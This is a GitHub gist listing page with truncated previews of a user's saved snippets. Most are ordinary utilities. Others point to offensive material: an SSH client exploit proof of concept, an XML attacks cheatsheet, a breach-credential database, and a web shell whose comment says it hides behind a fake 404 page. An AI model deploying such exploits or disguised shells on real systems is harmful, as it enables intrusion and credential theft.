Skip to content

Instantly share code, notes, and snippets.

View AgelxNash's full-sized avatar
Open to suggestions

Евгений Борисов AgelxNash

Open to suggestions
76 followers · 73 following
View GitHub Profile
@mehaase
mehaase / sshtranger_things.py
Last active August 26, 2024 10:28
SSHtranger Things Exploit POC
'''
Title: SSHtranger Things
Author: Mark E. Haase <[email protected]>
Homepage: https://www.hyperiongray.com
Date: 2019-01-17
CVE: CVE-2019-6111, CVE-2019-6110
Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt
Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1
We have nicknamed this "SSHtranger Things" because the bug is so old it could be
@631068264
631068264 / py2
Created December 6, 2018 02:24
python inet_ntoa and inet_aton
def inet_ntoa(n):
import socket, struct
if n:
try:
packed_value = struct.pack('!I', int(n))
ip = socket.inet_ntoa(packed_value)
return ip
except:
return None
return None
@douglasmiranda
douglasmiranda / instructions.md
Created July 19, 2018 05:51
Add email to Keybase.io PGP Key (Public Key)

Export your public key:

keybase pgp export > keybase-public.key

Export your private key:

keybase pgp export --secret &gt; keybase-private.key
@onedr0p
onedr0p / transmission-gc.sh
Last active October 21, 2023 19:04
Transmission Garbage Collector
#!/bin/sh
#
# INFO
#
# This works if sonarr and radarr are set up to have a Category of sonarr and radarr respectively
# If you are using other Categories to save your automated downloads, update the script where you see:
# "radarr"|"sonarr")
# This script will not touch anything outside those Categories
@freman
freman / login.go
Last active January 23, 2025 20:50
Log into grafana on a samsung tv
package main
// NB our grafana has keycloak in front, probably tweak a little (remove a click or two if you're just logging into grafana)
import (
"crypto/tls"
"encoding/base64"
"encoding/json"
"fmt"
"log"
@spacepatcher
spacepatcher / Breach Compilation (1.4 billion credentials) in Postgres.md
Last active June 2, 2025 17:58
Breach Compilation (1.4 billion credentials) in Postgres.md
@Hydraze
Hydraze / gist:372e221ef52ce8ddc6b5ba2108f2251f
Created December 12, 2017 18:25
PACK run on the 1.4 billion passwords ("BreachCompilation")
_
StatsGen 0.0.3 | |
_ __ __ _ ___| | _
| '_ \ / _` |/ __| |/ /
| |_) | (_| | (__| <
| .__/ \__,_|\___|_|\_\
| |
|_| [email protected]
@mgeeky
mgeeky / xml-attacks.md
Last active May 29, 2025 12:17
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.

@lc-at
lc-at / idx_v3_modified.php
Last active June 4, 2023 15:31
IndoXploit Shell v3 (Stealth Version)
<?php
/*
* # IndoXploit v3 Web Shell (Stealth Version)
* # What was involved?
* - Uses dynamic 404 page from the server to make the web shell looks like it was deleted
* - Login method is by using GET parameters, (example: 'http://example.com/idx_s.php?passwd=password_saia_kaka')
* # Important Bookmark
* - Password configuration at line 27
* - login_shell() function at line 40-52
* - Login validation at line 57-64
@Diagonactic
Diagonactic / authorizePublicKeybaseId.sh
Created July 29, 2017 18:02
Add the public key of a keybase.io user to authorized_keys without handling the user's private key or installing the keybase client
#!/bin/bash
function die() {
local message="$1" code=$2
if [[ -z "$code" ]]; then
code=1
fi
(>&2 echo -e "$message")
exit $code